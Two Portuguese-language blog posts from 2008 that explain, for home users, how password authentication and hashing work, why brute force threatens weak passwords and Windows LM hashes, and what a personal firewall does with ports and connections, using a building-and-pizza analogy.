No conto “Ali Babá e os 40 ladrões”, Ali Babá esconde-se no alto de uma árvore ao perceber a aproximação de um bando de ladrões, montados a cavalo. Perto da árvore, diante de uma grande pedra junto à montanha, o bando pára e o chefe dos ladrões pronuncia a célebre frase: “Abre-te sésamo” e a grande pedra se move, revelando uma caverna. Os ladrões entram com os cavalos carregados e depois de algum tempo saem da caverna sem as cargas, quando o chefe do bando pronuncia “Fecha-te sésamo” e a grande pedra volta a fechar a caverna. Algum tempo depois dos ladrões partirem, Ali Babá aproxima-se da pedra e pronuncia a mesma frase: “Abre-te sésamo”. E a pedra se move revelando um grande tesouro…

Esse é um clássico exemplo de captura de senha, feita por Alí Babá. Como o sistema de segurança da caverna não possuía um sistema biométrico (reconhecimento de voz), mas tão somente o reconhecimento da fala, qualquer um que soubesse a senha poderia abrir a caverna, tal como Alí Babá, revelando-se um sistema de segurança muito frágil.

Claro que isso é uma brincadeira, mas no mundo real e altamente tecnológico de hoje, utilizamos senhas a todo instante: para acessar o computador, ler e-mail, fazer transações bancárias, pagar um compra com cartão magnético e até para almoçar (para quem usa ticket em meio magnético). Muito de nossas vidas depende das senhas que utilizamos e é fundamental que saibamos utiliza-las da forma mais segura possível.

Para que serve uma senha

Embora todo mundo use, muitos não se percebem do seu sentido. Quando você vai acessar um sistema, tem que informar uma identificação: seu nome de usuário, sua agência e conta bancária, seu número de cartão de crédito, etc. que servem para identificar você, ou seja, “quem é você”. Até aí não quer dizer muita coisa, pois qualquer pessoa poderia informar a sua identificação para tentar se passar por você.

Para que um sistema tenha certeza que “você é quem diz ser”, torna-se necessário que haja uma autenticação. Para isso existem os Fatores de Identificação, divididos em 3 categorias:

• Algo que só você sabe: senha, frase de segurança, PIN
• Algo que só você possui: cartão de identificação, security token
• Alguma característica que só você tem: impressão digital, padrão de retina, padrão de voz e outras características biométricas.

A senha é o método mais utilizado por ser mais barato e simples de utilizar embora apresente alguns inconvenientes. Se for muito simples é fácil de ser quebrada. Se for muito complexa é mais fácil de esquecer. Mas, como (teoricamente) trata-se de um segredo que só você conhece, é suficiente para comprovar a sua autenticidade.

Para aumentar a segurança, alguns sistemas utilizam um segundo fator de autenticação, como um cartão magnético, que seria algo que só você possui. É o caso do cartão magnético do banco. Alguém pode descobrir sua senha, mas sem o cartão, não vai conseguir fazer nada. Da mesma forma, se alguém roubar seu cartão, não vai conseguir fazer nada se não souber a sua senha. O mesmo princípio é observado nos cofres: além do segredo, existe uma chave. O cofre só se abre com a chave e segredo corretos. É a chamada Autenticação de Dois Fatores.

Como funciona uma senha

Para que um sistema possa verificar a sua autenticidade através de senha, ele tem que armazena-la juntamente com o seu login (identificação). Armazena-la em texto claro não oferece qualquer segurança, pois qualquer pessoa que tenha acesso ao local em que elas estão armazenadas, terá acesso às senhas.

Alguns sistemas pouco seguros aplicam algum método criptográfico para armazena-las. Quando você se autentica, eles descriptografam a senha armazenada para comparar com a senha que você forneceu. Ou fazem o inverso: criptografam a senha digitada e comparam com a que está armazenada. Esse método também é inseguro porque toda criptografia depende de uma chave e um método criptográfico. Uma vez conhecidos, podem revelar todas as senhas.

Os sistemas mais seguros trabalham com uma forma de criptografia unidirecional, denominada de hash. Quando sua senha vai ser armazenada, o sistema aplica um método matemático para gerar uma seqüência numérica de tamanho fixo, geralmente representada em hexadecimal. O modelo matemático aplicado é publicamente conhecido, mas o resultado gerado é único para cada senha. Teoricamente é impossível que existam duas senhas diferentes que gerem o mesmo valor de hash. Pequenas variações na senha também geram hashes totalmente diferentes impossibilitando a dedução pela seqüência.

Exemplo:

Observe que a simples alteração de uma letra, resulta em um hash totalmente diferente e do mesmo tamanho, não importando o tamanho da sua senha.

Como não é possível decodificar o hash para obter a senha que o gerou, no momento da sua autenticação, o sistema aplica o mesmo método de cálculo na senha que você está fornecendo para obter o seu hash e assim comparar com o hash armazenado. Se forem iguais, sua senha está correta e você é autenticado.

Quebrando senhas

Você deve estar imaginando que, como o hash é uma criptografia “sem volta”, sua senha está segura. Depende… Como não há como decodificar o hash, aplicamos a chamada “Força Bruta” ou seja, método de tentativa e erro, para testar todas as combinações de caracteres possíveis, até encontrar aquela que gere o hash desejado. Com o poder computacional dos dos micros atuais e uso de programas específicos para isso, QUALQUER senha do Windows pode ser quebrada em questão de 1 ou 2 dias (na configuração padrão do Windows até a versão XP, daqui a pouco você vai entender a razão).

O tempo necessário para se quebrar uma senha depende de alguns fatores:

• Comprimento da senha: número de caracteres utilizados.
• Conjunto de caracteres: maiúsculas, minúsculas, números e símbolos.
• Poder computacional: quantas tentativas podem ser feitas num intervalo de tempo.

Imagine um sistema que só aceite como senha, valores numéricos de 0 a 9. Não é necessário ser nenhum cracker para quebrar uma senha que ofereça somente 10 possibilidades. Imagine agora, que esse sistema foi aprimorado e passa a aceitar senhas de um ou dois dígitos numéricos. Agora já temos 10 possibilidades (de 0 à 9) + 100 possibilidade (de 00 à 99), totalizando 110 combinações diferentes de senha. Já dá um pouco de trabalho, mas ainda é possível de se fazer manualmente.

Agora, vamos considerar que ao invés de usar somente dígitos numéricos, podemos utilizar somente letras maiúsculas. Temos então 26 possibilidades para uma senha de um caracter + 26 * 26 (ou 26² ) para dois caracteres, totalizando 702 combinações (26+676). Perceba que não alteramos o tamanho da senha, mas somente o conjunto de caracteres possíveis de serem combinados. Agora já fica mais difícil para uma pessoa quebrar manualmente, mas para um computador ainda é mais rápido que um piscar de olhos.

Para quem gosta de exercícios matemáticos, o número de combinações é calculada pela seguinte fórmula:

KS = L^m + L^m+1 + L^m+2 + …….. + L^M

onde:

KS = número total de senhas possíveis
L = comprimento do conjunto de caracteres
m = comprimento mínimo da senha
M = comprimento máximo da senha

Para quem não quer ter trabalho, a tabela abaixo ilustra as quantidades totais de combinações possíveis para senhas que tenham de 1 até 7 caracteres. Na primeira coluna temos o conjunto de caracteres utilizados; na segunda, a quantidade de caracteres desse conjunto; na terceira coluna, temos o total de combinações possíveis.

Combinações entre 1 a 7 caracteres por senha:

Se você observou a fórmula, o número de possibilidades cresce de forma exponencial, determinado pelo comprimento da senha e conjunto de caracteres utilizados. Resumindo: quanto mais diversificados forem os caracteres utilizados e quanto maior for a senha, mais difícil ela se torna para ser quebrada. Dependendo do sistema e de como você constrói sua senha ela pode ser quebrada em milissegundos ou em anos.

A fragilidade do Windows

Quando o Windows foi criado, a Microsoft utilizou um método de hash chamado de LM Hash ou Lan Manager Hash. Para os padrões da época, podiam até ser suficientes, mas com o poder computacional das máquinas atuais, tornou-se muito fácil de ser quebrado por força bruta. Posteriormente, a Microsoft passou a adotar o NT Hash, que já tem um nível de segurança muito melhor, mas por questões de compatibilidade com os sistemas antigos (Windows 95 e 98), o LM Hash continua a ser utilizado, habilitado por padrão no Windows XP, 2000 e 2003, juntamente com o NT Hash.

A fragilidade do LM hash está no fato de que, apesar de aceitar senhas de até 14 caracteres, o que já daria um bom nível de segurança, ele divide a senha em duas partes de 7 caracteres e ainda por cima, converte todas as letras para maiúsculas, reduzindo assim o universo de caracteres utilizados e o comprimento efetivo da senha para 7 posições.

Comparando os dois padrões:

• LM hash é case-insensitive (ignora se é maiúscula ou minúscula); o NT hash é case-sensitive.
• LM hash aceita um conjunto de 142 caracteres; NT hash aceita praticamente todo conjunto de 65,536 caracteres do padrão Unicode.
• LM hash divide a senha em dois blocos de 7 caracteres, ignorando o excedente; NT hash utiliza a senha inteira fornecida pelo usuário.

Embora o NT hash seja muito mais seguro, a coexistência com o LM hash permite que os programas quebrem a senha LM hash e depois tente diversas variações de minúsculas e maiúsculas para encontrar a senha NT hash.

——

Na segunda parte desse artigo, eu mostro como as senhas são (facilmente?) quebradas e como melhorar a segurança das suas senhas.

(Parte 2)

Adicione um comentário

]]> http://drwhitehat.wordpress.com/2008/09/05/abre-te-sesamo-1/feed/ 7 drwhitehat http://drwhitehat.wordpress.com/2008/08/29/firewall-sua-trincheira-na-internet/ http://drwhitehat.wordpress.com/2008/08/29/firewall-sua-trincheira-na-internet/#comments Fri, 29 Aug 2008 09:00:26 +0000 drwhitehat http://drwhitehat.wordpress.com/?p=97 ]]>

O que é firewall

No universo hostil da internet (veja meu primeiro artigo), sua principal linha de defesa é o firewall. Se você está em um computador na rede da sua empresa, provavelmente o firewall está instalado no ponto de conexão entre sua rede e a internet, aos cuidados do administrador da rede ou analista de segurança, dependendo do tamanho da sua rede.

Mas, se você está no seu computador doméstico, acessando a internet por banda larga, você está “de cara” para a internet e sua única barricada é o firewall pessoal do seu computador sendo fundamental que você entenda o que é o firewall e como ele funciona.

Literalmente, firewall significa “parede de fogo”, mas a tradução mais adequada é “parede corta fogo”. Análogo às paredes construídas para evitar a propagação de chamas, o firewall serve como barreira de proteção para o seu computador, isolando-o do “mundo externo” e para que você entenda o seu funcionamento, é necessário que você entenda como se processam as comunicações entre computadores numa rede.

Numa rede, cada computador possui um endereço próprio, chamado de Endereço IP, representado na forma de 4 octetos ou números que podem variar de 0 a 255, separados por pontos. Por exemplo: 200.240.182.100.

Quando você está acessado uma homepage qualquer, o seu navegador, que é um programa, está se comunicando com outro programa no computador remoto, o qual responde pelo serviço de páginas web. Se você está enviando um e-mail, existe outro programa respondendo por esse serviço. Em vias de regra, para cada serviço distinto, existe um programa que responde por ele.

Para que vários serviços possam coexistir num mesmo servidor, cada um desses programas atende por um número de porta. Assim, o serviço de páginas web atende na porta 80, o de e-mail, na porta 25, o de transferência de arquivos FTP, na porta 21 e assim por diante. A numeração dessas portas é padronizada no intervalo de 1 à 1024, uma para cada serviço distinto, sendo também chamadas de “portas privilegiadas”. As portas de número 1025 à 65535 são portas “não privilegiadas”, geralmente utilizadas pelos clientes das conexões (você).

Quando você, que é o cliente da conexão, vai acessar uma homepage, seu navegador “toma” uma porta desocupada no espaço não privilegiado do seu computador, envia uma solicitação de conexão para o endereço (IP) do servidor web, direcionado para porta 80, informando o endereço da sua máquina e o número de porta que o seu navegador “tomou”. O servidor web então, envia a resposta para esse endereço e porta, onde o seu navegador estará “escutando” para receber a mensagem de retorno.

A figura abaixo mostra como o seu computador se conectaria a um servidor web, iniciando uma conexão para a porta 80 do mesmo. A mensagem de retorno é enviada para a porta 1250 do seu computador, conforme foi informado ao servidor web na mensagem inicial. Nessa situação, seu micro está sem firewall e portanto, acessível à qualquer pessoa da internet (invasor).

Para ficar mais claro, imagine assim: Você mora numa cidade (internet) onde só existem edifícios. Cada edifício (computador) possui seu endereço na cidade. Nesses edifícios, as salas de número 1 à 1024 são para empresas (serviços) que vão atender aos moradores (clientes), do mesmo edifício ou de outro qualquer, sendo que os moradores (clientes) só moram em apartamentos de número 1025 à 65535. Então você, morador do edifício “A” (seu computador), apartamento 1250, faz um pedido de pizza (página web) para o pizzaria que está localizada no edifício “B”, sala 80. Quando a pizza fica pronta, a pizzaria manda para o endereço e apartamento que você informou no pedido, no caso, “edifício A, apartamento 1250”.

O grande problema, é que assim como nas cidades, onde se podia colocar cadeiras na calçada para um bate-papo com os vizinhos, quando a internet foi criada, não havia maiores preocupações com a segurança. Uma simples fechadura na porta (usuário e senha) era suficiente para manter os larápios do lado de fora.

Com o passar do tempo, crescimento das cidades e sofisticação das técnicas empregadas pelos criminosos, passamos a ter que lançar mão de cercas eletrificadas, câmeras de vigilância, alarmes e seguranças particulares para nos defender.

A mesma coisa aconteceu com a internet. Agora, não podemos mais deixar as portarias dos edifícios abertas para qualquer pessoa entrar. Temos que ter os porteiros e seguranças para “filtrar” quem entra ou sai do edifício. Essa é a função do firewall no seu computador.

Se você mora num condomínio fechado (rede corporativa) existe uma portaria (firewall corporativo) para controlar os acessos aos prédios (sua estação de trabalho) e você não precisa ter maiores preocupações porque existe alguém que administra essa portaria (o administrador da rede ou analista de segurança). Mas, se seu prédio fica com a portaria que dá direto na via pública (seu computador doméstico com banda-larga), você mesmo é que tem que contratar o segurança e supervisionar o serviço deles (firewall pessoal).

Veja a ilustração abaixo. Ela é similar à figura anterior, mas agora existe a figura do firewall que só permite o seu tráfego de saída e o retorno esperado. Qualquer outra tentativa de conexão é impedida por ele.

O firewall, então nada mais é do que um programa que controla e supervisiona o que entra ou sai do seu computador (ou rede), evitando acessos indesejados e invasões provenientes da internet. Mesmo que exista uma ou mais portas abertas no seu computador, o firewall vai impedir o acesso a elas, liberando somente o acesso às portas que forem permitidas.

Supervisionando a portaria

Para você ter idéia de que até algum tempo atrás não haviam maiores preocupações com a segurança, a Microsoft só passou a incorporar um firewall nos seus sistemas operacionais a partir do XP (service pack 2). Até o Windows 98 e 2000 Professional, você é que tinha que tomar a iniciativa de instalar um, porque eles não traziam isso embutido.

O firewall nativo no Windows, porém, não é algo que se pode chamar de “estado da arte” em termos de firewall. O maior problema que ele gera é a falsa sensação de segurança. Ele até filtra as conexões de entrada no seu micro, mas permite a saída de qualquer conexão, o que quer dizer que se um software malicioso já tiver se instalado na sua máquina, ele pode enviar informações para a internet sem que você saiba. Outro problema, é que ele permite que programas abram as portas para acesso externo, também sem que você saiba, ao serem instalados, facilitando sua vida mas comprometendo a segurança.

O ideal, nesses caso é partir para programas de terceiros. Existem várias opções de firewall pessoal na internet, gratuitas inclusive. O Comodo e o Zone Alarm são duas dessas opções. A segurança proporcionada por um firewall decente, entretanto, tem seu preço. Geralmente a configuração é mais complicada e eles emitem alertas para qualquer programa que esteja tentando acessar a internet, o que é muito bom, mas se você não souber interpretar esses alertas, acaba permitindo o que não deve.

Atendendo ao bom senso

Qualquer solução tecnológica, incluindo a segurança, deve obedecer ao bom senso. Você não vai construir um bunker subterrâneo, a prova de explosões atômicas para usar como residência, não é? É mais seguro? Certamente, mas compensa gastar uma fortuna e viver debaixo da terra em nome da segurança máxima? Pode fazer sentido para o posto de comando de governo de um país, mas para mas para moradia pessoal, certamente que não.

Controlar todo tráfego que entra e sai é o ideal e indispensável num ambiente corporativo, mas num ambiente doméstico, se você não tem os conhecimentos necessários e nem um administrador de redes ao seu dispor, o mínimo indispensável é ter uma solução que bloqueie qualquer entrada e libere todas as saídas. Tenha ciência porém, que essa solução impede que invasores entrem na sua máquina, mas uma vez comprometida (por spywares, trojans, worms e outras pragas) isso não impedirá que dados seus sejam enviados para fora. O complemento indispensável para essa situação consiste no emprego de um bom anti-vírus e anti-spyware.

Uma solução simples dentro dessa perspectiva, é “rotear” o modem. Esse recurso é utilizado quando queremos compartilhar a conexão de internet com outros micros da casa. Nesse caso, o próprio modem faz a conexão e recebe o endereço IP, o qual é público para internet, “escondendo” os computadores que ficam “do lado de dentro”, na sua rede local, que passam a utilizar endereços IP privados e não são acessíveis a partir da internet.

Milhões de computadores na internet e justo eu?

Talvez você esteja se perguntando “por que alguém iria querer invadir meu computador se eu não tenho nada de importante armazenado lá?”. Ainda que você não tenha nada além de jogos de paciência , um computador conectado por banda-larga é atraente para os invasores pela conexão de alta velocidade, podendo ser usado como escravo para lançar ataques contra outros sistemas; como “ponte” para esconder o endereço real do cracker; como espaço de armazenamento para compartilhamento de arquivos; para instalar programas para capturar contas e senhas de banco entre outras possibilidades que só uma mente maliciosa pode criar e principalmente porque raramente é uma máquina bem defendida. Isso sem mencionar os worms que ficam varrendo a internet a procura de computadores vulneráveis para se infiltrarem e utilizarem como vetor de propagação.

Uma coisa é certa: sem um “escudo de proteção” (ou “campo de força”, para os aficcionados for ficção científica), você não sobrevive muito tempo na internet.

—–

Adicione um comentário

]]> http://drwhitehat.wordpress.com/2008/08/29/firewall-sua-trincheira-na-internet/feed/ 2 drwhitehat